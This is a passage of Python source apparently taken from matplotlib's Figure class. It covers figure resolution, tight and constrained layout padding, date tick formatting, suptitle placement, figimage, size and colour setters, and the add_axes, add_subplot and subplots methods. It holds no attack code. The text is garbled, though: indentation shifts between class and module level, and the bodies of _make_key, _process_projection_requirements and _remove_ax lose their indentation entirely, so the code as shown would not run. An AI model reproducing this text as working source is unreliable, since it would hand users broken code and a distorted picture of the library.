                    doc="List of axes in the Figure. You can access the "
                        "axes in the Figure through this list. "
                        "Do not modify the list itself. Instead, use "
                        "`~Figure.add_axes`, `~.Figure.subplot` or "
                        "`~.Figure.delaxes` to add or remove an axes.")
    def _get_dpi(self):
        """Return the figure's resolution in dots per inch."""
        return self._dpi

    def _set_dpi(self, dpi, forward=True):
        """
        Parameters
        ----------
        dpi : float

        forward : bool
            Passed on to `~.Figure.set_size_inches`
        """
        self._dpi = dpi
        self.dpi_scale_trans.clear().scale(dpi)
        # Re-apply the current size in inches so the pixel-space bbox (and,
        # if *forward*, the canvas/window) is updated for the new dpi.
        w, h = self.get_size_inches()
        self.set_size_inches(w, h, forward=forward)
        self.callbacks.process('dpi_changed', self)

    dpi = property(_get_dpi, _set_dpi, doc="The resolution in dots per inch.")
    def get_tight_layout(self):
        """Return whether `.tight_layout` is called when drawing (bool)."""
        return self._tight
def set_tight_layout(self, tight):
    """
    Set whether and how `.tight_layout` is called when drawing.

    Parameters
    ----------
    tight : bool or dict with keys "pad", "w_pad", "h_pad", "rect" or None
        If a bool, sets whether to call `.tight_layout` upon drawing.
        If ``None``, use the ``figure.autolayout`` rcparam instead.
        If a dict, pass it as kwargs to `.tight_layout`, overriding the
        default paddings.
    """
    if tight is None:
        tight = rcParams['figure.autolayout']
    # A dict both enables tight layout and supplies its paddings.
    self._tight_parameters = tight if isinstance(tight, dict) else {}
    self._tight = bool(tight)
    self.stale = True
def get_constrained_layout(self):
    """
    Return a boolean: True means constrained layout is being used.

    See :doc:`/tutorials/intermediate/constrainedlayout_guide`.
    """
    using_constrained = self._constrained
    return using_constrained
def set_constrained_layout(self, constrained):
    """
    Set whether ``constrained_layout`` is used upon drawing.  If None,
    the :rc:`figure.constrained_layout.use` value will be used.

    When providing a dict containing the keys ``w_pad``, ``h_pad``
    the default ``constrained_layout`` paddings will be overridden.
    These pads are in inches and default to 3.0/72.0.  ``w_pad`` is
    the width padding and ``h_pad`` is the height padding.

    See :doc:`/tutorials/intermediate/constrainedlayout_guide`.

    Parameters
    ----------
    constrained : bool or dict or None
    """
    # Start from an all-None pad dict; set_constrained_layout_pads
    # fills in defaults (or the dict's overrides) below.
    self._constrained_layout_pads = {
        'w_pad': None, 'h_pad': None, 'wspace': None, 'hspace': None}
    if constrained is None:
        constrained = rcParams['figure.constrained_layout.use']
    self._constrained = bool(constrained)
    if isinstance(constrained, dict):
        self.set_constrained_layout_pads(**constrained)
    else:
        self.set_constrained_layout_pads()
    self.stale = True
def set_constrained_layout_pads(self, **kwargs):
    """
    Set padding for ``constrained_layout``.  Note the kwargs can be passed
    as a dictionary ``fig.set_constrained_layout(**paddict)``.

    See :doc:`/tutorials/intermediate/constrainedlayout_guide`.

    Parameters
    ----------
    w_pad : scalar
        Width padding in inches.  This is the pad around axes and is
        meant to make sure there is enough room for fonts to look good.
        Defaults to 3 pts = 0.04167 inches
    h_pad : scalar
        Height padding in inches. Defaults to 3 pts.
    wspace : scalar
        Width padding between subplots, expressed as a fraction of the
        subplot width.  The total padding ends up being w_pad + wspace.
    hspace : scalar
        Height padding between subplots, expressed as a fraction of the
        subplot width.  The total padding ends up being h_pad + hspace.
    """
    for name in ('w_pad', 'h_pad', 'wspace', 'hspace'):
        value = kwargs.get(name)
        if value is not None:
            self._constrained_layout_pads[name] = value
        else:
            # Fall back to the rcParams default for this pad.
            self._constrained_layout_pads[name] = (
                rcParams['figure.constrained_layout.' + name])
def get_constrained_layout_pads(self, relative=False):
    """
    Get padding for ``constrained_layout``.

    Returns a list of ``w_pad, h_pad`` in inches and
    ``wspace`` and ``hspace`` as fractions of the subplot.

    See :doc:`/tutorials/intermediate/constrainedlayout_guide`.

    Parameters
    ----------
    relative : boolean
        If `True`, then convert from inches to figure relative.
    """
    pads = self._constrained_layout_pads
    w_pad, h_pad = pads['w_pad'], pads['h_pad']
    wspace, hspace = pads['wspace'], pads['hspace']
    if relative and (w_pad is not None or h_pad is not None):
        # Convert the inch pads to figure-relative units via the renderer.
        renderer = layoutbox.get_renderer(self)
        dpi = renderer.dpi
        w_pad = w_pad * dpi / renderer.width
        h_pad = h_pad * dpi / renderer.height
    return w_pad, h_pad, wspace, hspace
def autofmt_xdate(self, bottom=0.2, rotation=30, ha='right', which=None):
    """
    Date ticklabels often overlap, so it is useful to rotate them
    and right align them.  Also, a common use case is a number of
    subplots with shared xaxes where the x-axis is date data.  The
    ticklabels are often long, and it helps to rotate them on the
    bottom subplot and turn them off on other subplots, as well as
    turn off xlabels.

    Parameters
    ----------
    bottom : scalar
        The bottom of the subplots for :meth:`subplots_adjust`.
    rotation : angle in degrees
        The rotation of the xtick labels.
    ha : str
        The horizontal alignment of the xticklabels.
    which : {None, 'major', 'minor', 'both'}
        Selects which ticklabels to rotate. Default is None which works
        the same as major.
    """
    # Only subplots know their grid position (``is_last_row``); if any
    # axes is a free-floating Axes the per-row logic below is skipped.
    allsubplots = all(hasattr(ax, 'is_last_row') for ax in self.axes)
    if len(self.axes) == 1:
        for label in self.axes[0].get_xticklabels(which=which):
            label.set_ha(ha)
            label.set_rotation(rotation)
    else:
        if allsubplots:
            for ax in self.get_axes():
                if ax.is_last_row():
                    # Bottom row keeps (rotated, aligned) tick labels.
                    for label in ax.get_xticklabels(which=which):
                        label.set_ha(ha)
                        label.set_rotation(rotation)
                else:
                    # Other rows: hide x tick labels and the x label.
                    for label in ax.get_xticklabels(which=which):
                        label.set_visible(False)
                    ax.set_xlabel('')
    if allsubplots:
        self.subplots_adjust(bottom=bottom)
    self.stale = True
def get_children(self):
    """Get a list of artists contained in the figure."""
    # Keep the same ordering as the draw traversal: background patch
    # first, then each artist group.
    children = [self.patch]
    for group in (self.artists, self.axes, self.lines, self.patches,
                  self.texts, self.images, self.legends):
        children.extend(group)
    return children
def contains(self, mouseevent):
    """
    Test whether the mouse event occurred on the figure.

    Returns
    -------
    bool, {}
    """
    # A user-installed containment test (via Artist.set_contains) takes
    # precedence; it signals "no custom test" by returning inside=None.
    inside, info = self._default_contains(mouseevent, figure=self)
    if inside is None:
        inside = self.bbox.contains(mouseevent.x, mouseevent.y)
        info = {}
    return inside, info
def get_window_extent(self, *args, **kwargs):
    """
    Return the figure bounding box in display space.

    Arguments are accepted for API compatibility but ignored.
    """
    extent = self.bbox
    return extent
def suptitle(self, t, **kwargs):
    """
    Add a centered title to the figure.

    Parameters
    ----------
    t : str
        The title text.
    x : float, default 0.5
        The x location of the text in figure coordinates.
    y : float, default 0.98
        The y location of the text in figure coordinates.
    horizontalalignment, ha : {'center', 'left', 'right'}, default: 'center'
        The horizontal alignment of the text relative to (*x*, *y*).
    verticalalignment, va : {'top', 'center', 'bottom', 'baseline'}, \
default: 'top'
        The vertical alignment of the text relative to (*x*, *y*).
    fontsize, size : default: :rc:`figure.titlesize`
        The font size of the text. See `.Text.set_size` for possible
        values.
    fontweight, weight : default: :rc:`figure.titleweight`
        The font weight of the text. See `.Text.set_weight` for possible
        values.

    Returns
    -------
    text
        The `.Text` instance of the title.

    Other Parameters
    ----------------
    fontproperties : None or dict, optional
        A dict of font properties. If *fontproperties* is given the
        default values for font size and weight are taken from the
        `FontProperties` defaults. :rc:`figure.titlesize` and
        :rc:`figure.titleweight` are ignored in this case.
    **kwargs
        Additional kwargs are :class:`matplotlib.text.Text` properties.

    Examples
    --------
    >>> fig.suptitle('This is the figure title', fontsize=12)
    """
    # Remember whether the caller positioned the title explicitly; if so,
    # constrained layout must not move it (see the layoutbox branch below).
    manual_position = ('x' in kwargs or 'y' in kwargs)
    x = kwargs.pop('x', 0.5)
    y = kwargs.pop('y', 0.98)
    if 'horizontalalignment' not in kwargs and 'ha' not in kwargs:
        kwargs['horizontalalignment'] = 'center'
    if 'verticalalignment' not in kwargs and 'va' not in kwargs:
        kwargs['verticalalignment'] = 'top'
    if 'fontproperties' not in kwargs:
        if 'fontsize' not in kwargs and 'size' not in kwargs:
            kwargs['size'] = rcParams['figure.titlesize']
        if 'fontweight' not in kwargs and 'weight' not in kwargs:
            kwargs['weight'] = rcParams['figure.titleweight']
    sup = self.text(x, y, t, **kwargs)
    if self._suptitle is not None:
        # Reuse the existing suptitle Text: copy text/position/properties
        # from the throwaway instance, then discard it.
        self._suptitle.set_text(t)
        self._suptitle.set_position((x, y))
        self._suptitle.update_from(sup)
        sup.remove()
    else:
        self._suptitle = sup
        self._suptitle._layoutbox = None
        if self._layoutbox is not None and not manual_position:
            w_pad, h_pad, wspace, hspace = \
                self.get_constrained_layout_pads(relative=True)
            figlb = self._layoutbox
            self._suptitle._layoutbox = layoutbox.LayoutBox(
                parent=figlb, artist=self._suptitle,
                name=figlb.name+'.suptitle')
            # stack the suptitle on top of all the children.
            # Some day this should be on top of all the children in the
            # gridspec only.
            for child in figlb.children:
                if child is not self._suptitle._layoutbox:
                    layoutbox.vstack([self._suptitle._layoutbox,
                                      child],
                                     padding=h_pad*2., strength='required')
    self.stale = True
    return self._suptitle
def set_canvas(self, canvas):
    """
    Set the canvas that contains the figure.

    Parameters
    ----------
    canvas : FigureCanvas
    """
    self.canvas = canvas
def figimage(self, X, xo=0, yo=0, alpha=None, norm=None, cmap=None,
             vmin=None, vmax=None, origin=None, resize=False, **kwargs):
    """
    Add a non-resampled image to the figure.

    The image is attached to the lower or upper left corner depending on
    *origin*.

    Parameters
    ----------
    X
        The image data. This is an array of one of the following shapes:

        - MxN: luminance (grayscale) values
        - MxNx3: RGB values
        - MxNx4: RGBA values
    xo, yo : int
        The *x*/*y* image offset in pixels.
    alpha : None or float
        The alpha blending value.
    norm : :class:`matplotlib.colors.Normalize`
        A :class:`.Normalize` instance to map the luminance to the
        interval [0, 1].
    cmap : str or :class:`matplotlib.colors.Colormap`
        The colormap to use. Default: :rc:`image.cmap`.
    vmin, vmax : scalar
        If *norm* is not given, these values set the data limits for the
        colormap.
    origin : {'upper', 'lower'}
        Indicates where the [0, 0] index of the array is in the upper left
        or lower left corner of the axes. Defaults to :rc:`image.origin`.
    resize : bool
        If *True*, resize the figure to match the given image size.

    Returns
    -------
    :class:`matplotlib.image.FigureImage`

    Other Parameters
    ----------------
    **kwargs
        Additional kwargs are `.Artist` kwargs passed on to `.FigureImage`.

    Notes
    -----
    figimage complements the axes image
    (:meth:`~matplotlib.axes.Axes.imshow`) which will be resampled
    to fit the current axes.  If you want a resampled image to
    fill the entire figure, you can define an
    :class:`~matplotlib.axes.Axes` with extent [0, 0, 1, 1].

    Examples::

        f = plt.figure()
        nx = int(f.get_figwidth() * f.dpi)
        ny = int(f.get_figheight() * f.dpi)
        data = np.random.random((ny, nx))
        f.figimage(data)
        plt.show()
    """
    if resize:
        dpi = self.get_dpi()
        # Figure size in inches = pixel extents (X is row-major, so
        # shape[1] is the width) divided by the resolution.
        figsize = [x / dpi for x in (X.shape[1], X.shape[0])]
        self.set_size_inches(figsize, forward=True)
    im = mimage.FigureImage(self, cmap, norm, xo, yo, origin, **kwargs)
    im.stale_callback = _stale_figure_callback
    im.set_array(X)
    im.set_alpha(alpha)
    if norm is None:
        # Without an explicit norm, vmin/vmax define the color limits.
        im.set_clim(vmin, vmax)
    self.images.append(im)
    im._remove_method = self.images.remove
    self.stale = True
    return im
def set_size_inches(self, w, h=None, forward=True):
    """
    Set the figure size in inches.

    Call signatures::

        fig.set_size_inches(w, h)  # OR
        fig.set_size_inches((w, h))

    Parameters
    ----------
    w : (float, float) or float
        Width and height in inches (if height not specified as a separate
        argument) or width.
    h : float
        Height in inches.
    forward : bool, default: True
        If ``True``, the canvas size is automatically updated, e.g.,
        you can resize the figure window from the shell.

    See Also
    --------
    matplotlib.Figure.get_size_inches
    """
    if h is None:
        # Called with a single (width, height) pair as the only argument.
        w, h = w
    size = np.array([w, h])
    if not np.isfinite(size).all() or (size <= 0).any():
        raise ValueError(f'figure size must be positive finite not {size}')
    self.bbox_inches.p1 = size
    if forward:
        canvas = getattr(self, 'canvas')
        manager = (getattr(canvas, 'manager', None)
                   if canvas is not None else None)
        if manager is not None:
            # High-DPI canvases report a _dpi_ratio scale factor.
            dpi_ratio = getattr(canvas, '_dpi_ratio', 1)
            manager.resize(*(size * self.dpi / dpi_ratio).astype(int))
    self.stale = True
def get_size_inches(self):
    """
    Returns the current size of the figure in inches.

    Returns
    -------
    size : ndarray
        The size (width, height) of the figure in inches.

    See Also
    --------
    matplotlib.Figure.set_size_inches
    """
    # Return a copy so callers cannot mutate the stored bbox point.
    size = np.array(self.bbox_inches.p1)
    return size
def get_edgecolor(self):
    """Get the edge color of the Figure rectangle."""
    edge = self.patch.get_edgecolor()
    return edge
def get_facecolor(self):
    """Get the face color of the Figure rectangle."""
    face = self.patch.get_facecolor()
    return face
def get_figwidth(self):
    """Return the figure width as a float."""
    width = self.bbox_inches.width
    return width
def get_figheight(self):
    """Return the figure height as a float."""
    height = self.bbox_inches.height
    return height
def get_dpi(self):
    """Return the resolution in dots per inch as a float."""
    resolution = self.dpi
    return resolution
def get_frameon(self):
    """
    Return the figure's background patch visibility, i.e.
    whether the figure background will be drawn.  Equivalent to
    ``Figure.patch.get_visible()``.
    """
    visible = self.patch.get_visible()
    return visible
def set_edgecolor(self, color):
    """
    Set the edge color of the Figure rectangle.

    Parameters
    ----------
    color : color
    """
    # Delegates to the background patch, which owns the edge color.
    self.patch.set_edgecolor(color)
def set_facecolor(self, color):
    """
    Set the face color of the Figure rectangle.

    Parameters
    ----------
    color : color
    """
    # Delegates to the background patch, which owns the face color.
    self.patch.set_facecolor(color)
def set_dpi(self, val):
    """
    Set the resolution of the figure in dots-per-inch.

    Parameters
    ----------
    val : float
    """
    # Assigning ``self.dpi`` goes through the ``dpi`` property setter.
    self.dpi = val
    self.stale = True
def set_figwidth(self, val, forward=True):
    """
    Set the width of the figure in inches.

    Parameters
    ----------
    val : float
    forward : bool
    """
    # Reuse set_size_inches so validation and canvas resize apply.
    self.set_size_inches(val, self.get_figheight(), forward=forward)
def set_figheight(self, val, forward=True):
    """
    Set the height of the figure in inches.

    Parameters
    ----------
    val : float
    forward : bool
    """
    # Reuse set_size_inches so validation and canvas resize apply.
    self.set_size_inches(self.get_figwidth(), val, forward=forward)
def set_frameon(self, b):
    """
    Set the figure's background patch visibility, i.e.
    whether the figure background will be drawn.  Equivalent to
    ``Figure.patch.set_visible()``.

    Parameters
    ----------
    b : bool
    """
    self.patch.set_visible(b)
    self.stale = True
frameon = property(get_frameon, set_frameon)
def delaxes(self, ax):
    """
    Remove the `~matplotlib.axes.Axes` *ax* from the figure and update
    the current axes.
    """
    self._axstack.remove(ax)
    # Notify registered axes observers of the change.
    for observer in self._axobservers:
        observer(self)
    self.stale = True
def add_artist(self, artist, clip=False):
    """
    Add any :class:`~matplotlib.artist.Artist` to the figure.

    Usually artists are added to axes objects using
    :meth:`matplotlib.axes.Axes.add_artist`, but use this method in the
    rare cases that adding directly to the figure is necessary.

    Parameters
    ----------
    artist : `~matplotlib.artist.Artist`
        The artist to add to the figure. If the added artist has no
        transform previously set, its transform will be set to
        ``figure.transFigure``.
    clip : bool, optional, default ``False``
        An optional parameter ``clip`` determines whether the added artist
        should be clipped by the figure patch. Default is *False*,
        i.e. no clipping.

    Returns
    -------
    artist : The added `~matplotlib.artist.Artist`
    """
    artist.set_figure(self)
    self.artists.append(artist)
    artist._remove_method = self.artists.remove
    # Default to figure coordinates unless the artist already carries
    # its own transform.
    if not artist.is_transform_set():
        artist.set_transform(self.transFigure)
    if clip:
        artist.set_clip_path(self.patch)
    self.stale = True
    return artist
def _make_key(self, *args, **kwargs):
"""Make a hashable key out of args and kwargs."""
def fixitems(items):
# items may have arrays and lists in them, so convert them
# to tuples for the key
ret = []
for k, v in items:
# some objects can define __getitem__ without being
# iterable and in those cases the conversion to tuples
# will fail. So instead of using the np.iterable(v) function
# we simply try and convert to a tuple, and proceed if not.
try:
v = tuple(v)
except Exception:
pass
ret.append((k, v))
return tuple(ret)
def fixlist(args):
ret = []
for a in args:
if np.iterable(a):
a = tuple(a)
ret.append(a)
return tuple(ret)
key = fixlist(args), fixitems(kwargs.items())
return key
def _process_projection_requirements(
self, *args, polar=False, projection=None, **kwargs):
"""
Handle the args/kwargs to add_axes/add_subplot/gca, returning::
(axes_proj_class, proj_class_kwargs, proj_stack_key)
which can be used for new axes initialization/identification.
"""
if polar:
if projection is not None and projection != 'polar':
raise ValueError(
"polar=True, yet projection=%r. "
"Only one of these arguments should be supplied." %
projection)
projection = 'polar'
if isinstance(projection, str) or projection is None:
projection_class = projections.get_projection_class(projection)
elif hasattr(projection, '_as_mpl_axes'):
projection_class, extra_kwargs = projection._as_mpl_axes()
kwargs.update(**extra_kwargs)
else:
raise TypeError('projection must be a string, None or implement a '
'_as_mpl_axes method. Got %r' % projection)
# Make the key without projection kwargs, this is used as a unique
# lookup for axes instances
key = self._make_key(*args, **kwargs)
return projection_class, kwargs, key
@docstring.dedent_interpd
def add_axes(self, *args, **kwargs):
    """
    Add an axes to the figure.

    Call signatures::

        add_axes(rect, projection=None, polar=False, **kwargs)
        add_axes(ax)

    Parameters
    ----------
    rect : sequence of float
        The dimensions [left, bottom, width, height] of the new axes. All
        quantities are in fractions of figure width and height.
    projection : {None, 'aitoff', 'hammer', 'lambert', 'mollweide', \
'polar', 'rectilinear', str}, optional
        The projection type of the `~.axes.Axes`. *str* is the name of
        a custom projection, see `~matplotlib.projections`. The default
        None results in a 'rectilinear' projection.
    polar : boolean, optional
        If True, equivalent to projection='polar'.
    sharex, sharey : `~.axes.Axes`, optional
        Share the x or y `~matplotlib.axis` with sharex and/or sharey.
        The axis will have the same limits, ticks, and scale as the axis
        of the shared axes.
    label : str
        A label for the returned axes.

    Other Parameters
    ----------------
    **kwargs
        This method also takes the keyword arguments for
        the returned axes class. The keyword arguments for the
        rectilinear axes class `~.axes.Axes` can be found in
        the following table but there might also be other keyword
        arguments if another projection is used, see the actual axes
        class.

        %(Axes)s

    Returns
    -------
    axes : `~.axes.Axes` (or a subclass of `~.axes.Axes`)
        The returned axes class depends on the projection used. It is
        `~.axes.Axes` if rectilinear projection are used and
        `.projections.polar.PolarAxes` if polar projection
        are used.

    Notes
    -----
    If the figure already has an axes with key (*args*,
    *kwargs*) then it will simply make that axes current and
    return it.  This behavior is deprecated. Meanwhile, if you do
    not want this behavior (i.e., you want to force the creation of a
    new axes), you must use a unique set of args and kwargs.  The axes
    *label* attribute has been exposed for this purpose: if you want
    two axes that are otherwise identical to be added to the figure,
    make sure you give them unique labels.

    In rare circumstances, `.add_axes` may be called with a single
    argument, a axes instance already created in the present figure but
    not in the figure's list of axes.

    See Also
    --------
    .Figure.add_subplot
    .pyplot.subplot
    .pyplot.axes
    .Figure.subplots
    .pyplot.subplots

    Examples
    --------
    Some simple examples::

        rect = l, b, w, h
        fig = plt.figure()
        fig.add_axes(rect, label=label1)
        fig.add_axes(rect, label=label2)
        fig.add_axes(rect, frameon=False, facecolor='g')
        fig.add_axes(rect, polar=True)
        ax = fig.add_axes(rect, projection='polar')
        fig.delaxes(ax)
        fig.add_axes(ax)
    """
    if not len(args):
        return

    # shortcut the projection "key" modifications later on, if an axes
    # with the exact args/kwargs exists, return it immediately.
    key = self._make_key(*args, **kwargs)
    ax = self._axstack.get(key)
    if ax is not None:
        self.sca(ax)
        return ax

    if isinstance(args[0], Axes):
        # Re-adding an existing Axes (e.g. after delaxes).
        a = args[0]
        if a.get_figure() is not self:
            raise ValueError(
                "The Axes must have been created in the present figure")
    else:
        rect = args[0]
        if not np.isfinite(rect).all():
            raise ValueError('all entries in rect must be finite '
                             'not {}'.format(rect))
        projection_class, kwargs, key = \
            self._process_projection_requirements(*args, **kwargs)

        # check that an axes of this type doesn't already exist, if it
        # does, set it as active and return it
        ax = self._axstack.get(key)
        if isinstance(ax, projection_class):
            self.sca(ax)
            return ax

        # create the new axes using the axes class given
        a = projection_class(self, rect, **kwargs)

    return self._add_axes_internal(key, a)
@docstring.dedent_interpd
def add_subplot(self, *args, **kwargs):
    """
    Add an `~.axes.Axes` to the figure as part of a subplot arrangement.

    Call signatures::

        add_subplot(nrows, ncols, index, **kwargs)
        add_subplot(pos, **kwargs)
        add_subplot(ax)
        add_subplot()

    Parameters
    ----------
    *args
        Either a 3-digit integer or three separate integers
        describing the position of the subplot. If the three
        integers are *nrows*, *ncols*, and *index* in order, the
        subplot will take the *index* position on a grid with *nrows*
        rows and *ncols* columns. *index* starts at 1 in the upper left
        corner and increases to the right.

        *pos* is a three digit integer, where the first digit is the
        number of rows, the second the number of columns, and the third
        the index of the subplot. i.e. fig.add_subplot(235) is the same as
        fig.add_subplot(2, 3, 5). Note that all integers must be less than
        10 for this form to work.

        If no positional arguments are passed, defaults to (1, 1, 1).

        In rare circumstances, `.add_subplot` may be called with a single
        argument, a subplot axes instance already created in the
        present figure but not in the figure's list of axes.
    projection : {None, 'aitoff', 'hammer', 'lambert', 'mollweide', \
'polar', 'rectilinear', str}, optional
        The projection type of the subplot (`~.axes.Axes`). *str* is the
        name of a custom projection, see `~matplotlib.projections`. The
        default None results in a 'rectilinear' projection.
    polar : boolean, optional
        If True, equivalent to projection='polar'.
    sharex, sharey : `~.axes.Axes`, optional
        Share the x or y `~matplotlib.axis` with sharex and/or sharey.
        The axis will have the same limits, ticks, and scale as the axis
        of the shared axes.
    label : str
        A label for the returned axes.

    Other Parameters
    ----------------
    **kwargs
        This method also takes the keyword arguments for the returned axes
        base class; except for the *figure* argument. The keyword arguments
        for the rectilinear base class `~.axes.Axes` can be found in
        the following table but there might also be other keyword
        arguments if another projection is used.

        %(Axes)s

    Returns
    -------
    axes : `.axes.SubplotBase`, or another subclass of `~.axes.Axes`
        The axes of the subplot. The returned axes base class depends on
        the projection used. It is `~.axes.Axes` if rectilinear projection
        are used and `.projections.polar.PolarAxes` if polar projection
        are used. The returned axes is then a subplot subclass of the
        base class.

    Notes
    -----
    If the figure already has a subplot with key (*args*,
    *kwargs*) then it will simply make that subplot current and
    return it.  This behavior is deprecated. Meanwhile, if you do
    not want this behavior (i.e., you want to force the creation of a
    new subplot), you must use a unique set of args and kwargs.  The axes
    *label* attribute has been exposed for this purpose: if you want
    two subplots that are otherwise identical to be added to the figure,
    make sure you give them unique labels.

    See Also
    --------
    .Figure.add_axes
    .pyplot.subplot
    .pyplot.axes
    .Figure.subplots
    .pyplot.subplots

    Examples
    --------
    ::

        fig = plt.figure()

        fig.add_subplot(221)

        # equivalent but more general
        ax1 = fig.add_subplot(2, 2, 1)

        # add a subplot with no frame
        ax2 = fig.add_subplot(222, frameon=False)

        # add a polar subplot
        fig.add_subplot(223, projection='polar')

        # add a red subplot that share the x-axis with ax1
        fig.add_subplot(224, sharex=ax1, facecolor='red')

        # delete ax2 from the figure
        fig.delaxes(ax2)

        # add ax2 to the figure again
        fig.add_subplot(ax2)
    """
    if not len(args):
        args = (1, 1, 1)

    if len(args) == 1 and isinstance(args[0], Integral):
        # Expand a three-digit spec like 235 into (2, 3, 5).
        if not 100 <= args[0] <= 999:
            raise ValueError("Integer subplot specification must be a "
                             "three-digit number, not {}".format(args[0]))
        args = tuple(map(int, str(args[0])))

    if 'figure' in kwargs:
        # Axes itself allows for a 'figure' kwarg, but since we want to
        # bind the created Axes to self, it is not allowed here.
        raise TypeError(
            "add_subplot() got an unexpected keyword argument 'figure'")

    if isinstance(args[0], SubplotBase):
        a = args[0]
        if a.get_figure() is not self:
            raise ValueError(
                "The Subplot must have been created in the present figure")
        # make a key for the subplot (which includes the axes object id
        # in the hash)
        key = self._make_key(*args, **kwargs)
    else:
        projection_class, kwargs, key = \
            self._process_projection_requirements(*args, **kwargs)

        # try to find the axes with this key in the stack
        ax = self._axstack.get(key)

        if ax is not None:
            if isinstance(ax, projection_class):
                # the axes already existed, so set it as active & return
                self.sca(ax)
                return ax
            else:
                # Undocumented convenience behavior:
                # subplot(111); subplot(111, projection='polar')
                # will replace the first with the second.
                # Without this, add_subplot would be simpler and
                # more similar to add_axes.
                self._axstack.remove(ax)

        a = subplot_class_factory(projection_class)(self, *args, **kwargs)

    return self._add_axes_internal(key, a)
def _add_axes_internal(self, key, ax):
    """Private helper for `add_axes` and `add_subplot`."""
    self._axstack.add(key, ax)
    # Newly added axes becomes the current axes.
    self.sca(ax)
    ax._remove_method = self._remove_ax
    self.stale = True
    ax.stale_callback = _stale_figure_callback
    return ax
def subplots(self, nrows=1, ncols=1, sharex=False, sharey=False,
             squeeze=True, subplot_kw=None, gridspec_kw=None):
    """
    Add a set of subplots to this figure.

    This utility wrapper makes it convenient to create common layouts of
    subplots in a single call.

    Parameters
    ----------
    nrows, ncols : int, optional, default: 1
        Number of rows/columns of the subplot grid.
    sharex, sharey : bool or {'none', 'all', 'row', 'col'}, default: False
        Controls sharing of properties among x (`sharex`) or y (`sharey`)
        axes:

        - True or 'all': x- or y-axis will be shared among all subplots.
        - False or 'none': each subplot x- or y-axis will be independent.
        - 'row': each subplot row will share an x- or y-axis.
        - 'col': each subplot column will share an x- or y-axis.

        When subplots have a shared x-axis along a column, only the x tick
        labels of the bottom subplot are created. Similarly, when subplots
        have a shared y-axis along a row, only the y tick labels of the
        first column subplot are created. To later turn other subplots'
        ticklabels on, use `~matplotlib.axes.Axes.tick_params`.
    squeeze : bool, optional, default: True
        - If True, extra dimensions are squeezed out from the returned
          array of Axes:

          - if only one subplot is constructed (nrows=ncols=1), the
            resulting single Axes object is returned as a scalar.
          - for Nx1 or 1xM subplots, the returned object is a 1D numpy
            object array of Axes objects.
          - for NxM, subplots with N>1 and M>1 are returned as a 2D array.

        - If False, no squeezing at all is done: the returned Axes object
          is always a 2D array containing Axes instances, even if it ends
          up being 1x1.
    subplot_kw : dict, optional
        Dict with keywords passed to the
        :meth:`~matplotlib.figure.Figure.add_subplot` call used to create
        each subplot.
    gridspec_kw : dict, optional
        Dict with keywords passed to the
        `~matplotlib.gridspec.GridSpec` constructor used to create
        the grid the subplots are placed on.

    Returns
    -------
    ax : `~.axes.Axes` object or array of Axes objects.
        *ax* can be either a single `~matplotlib.axes.Axes` object or
        an array of Axes objects if more than one subplot was created. The
        dimensions of the resulting array can be controlled with the
        squeeze keyword, see above.

    Examples
    --------
    ::

        # First create some toy data:
        x = np.linspace(0, 2*np.pi, 400)
        y = np.sin(x**2)

        # Create a figure
        plt.figure()

        # Create a subplot
        ax = fig.subplots()
        ax.plot(x, y)
        ax.set_title('Simple plot')

        # Create two subplots and unpack the output array immediately
        ax1, ax2 = fig.subplots(1, 2, sharey=True)
        ax1.plot(x, y)
        ax1.set_title('Sharing Y axis')
        ax2.scatter(x, y)

        # Create four polar axes and access them through the returned array
        axes = fig.subplots(2, 2, subplot_kw=dict(polar=True))
        axes[0, 0].plot(x, y)
        axes[1, 1].scatter(x, y)

        # Share a X axis with each column of subplots
        fig.subplots(2, 2, sharex='col')

        # Share a Y axis with each row of subplots
        fig.subplots(2, 2, sharey='row')

        # Share both X and Y axes with all subplots
        fig.subplots(2, 2, sharex='all', sharey='all')

        # Note that this is the same as
        fig.subplots(2, 2, sharex=True, sharey=True)

    See Also
    --------
    .pyplot.subplots
    .Figure.add_subplot
    .pyplot.subplot
    """
    # Normalize the bool shorthands to the string forms used below.
    if isinstance(sharex, bool):
        sharex = "all" if sharex else "none"
    if isinstance(sharey, bool):
        sharey = "all" if sharey else "none"
    # This check was added because it is very easy to type
    # `subplots(1, 2, 1)` when `subplot(1, 2, 1)` was intended.
    # In most cases, no error will ever occur, but mysterious behavior
    # will result because what was intended to be the subplot index is
    # instead treated as a bool for sharex.
    if isinstance(sharex, Integral):
        cbook._warn_external(
            "sharex argument to subplots() was an integer. Did you "
            "intend to use subplot() (without 's')?")
    cbook._check_in_list(["all", "row", "col", "none"],
                         sharex=sharex, sharey=sharey)
    if subplot_kw is None:
        subplot_kw = {}
    if gridspec_kw is None:
        gridspec_kw = {}
    # don't mutate kwargs passed by user...
    subplot_kw = subplot_kw.copy()
    gridspec_kw = gridspec_kw.copy()

    if self.get_constrained_layout():
        gs = GridSpec(nrows, ncols, figure=self, **gridspec_kw)
    else:
        # this should turn constrained_layout off if we don't want it
        gs = GridSpec(nrows, ncols, figure=None, **gridspec_kw)
    self._gridspecs.append(gs)

    # Create array to hold all axes.
    axarr = np.empty((nrows, ncols), dtype=object)
    for row in range(nrows):
        for col in range(ncols):
            # Row-major creation order means axarr[0, 0], axarr[row, 0]
            # and axarr[0, col] already exist when needed for sharing.
            shared_with = {"none": None, "all": axarr[0, 0],
                           "row": axarr[row, 0], "col": axarr[0, col]}
            subplot_kw["sharex"] = shared_with[sharex]
            subplot_kw["sharey"] = shared_with[sharey]
            axarr[row, col] = self.add_subplot(gs[row, col], **subplot_kw)

    # turn off redundant tick labeling
    if sharex in ["col", "all"]:
        # turn off all but the bottom row
        for ax in axarr[:-1, :].flat:
            ax.xaxis.set_tick_params(which='both',
                                     labelbottom=False, labeltop=False)
            ax.xaxis.offsetText.set_visible(False)
    if sharey in ["row", "all"]:
        # turn off all but the first column
        for ax in axarr[:, 1:].flat:
            ax.yaxis.set_tick_params(which='both',
                                     labelleft=False, labelright=False)
            ax.yaxis.offsetText.set_visible(False)

    if squeeze:
        # Discarding unneeded dimensions that equal 1.  If we only have one
        # subplot, just return it instead of a 1-element array.
        return axarr.item() if axarr.size == 1 else axarr.squeeze()
    else:
        # Returned axis array will be always 2-d, even if nrows=ncols=1.
        return axarr
def _remove_ax(self, ax):
def _reset_locators_and_formatters(axis):
# Set the formatters and locators to be associated with axis
# (where previously they may have been associated with another
# Axis isntance)
#
# Because set_major_formatter() etc. force isDefault_* to be False,
# we have to manually check if the original formatter was a
# default and manually set isDefault_* if that was the case.
majfmt = axis.get_major_formatter()
isDefault = majfmt.axis.isDefault_majfmt
axis.set_major_formatter(majfmt)
if isDefault:
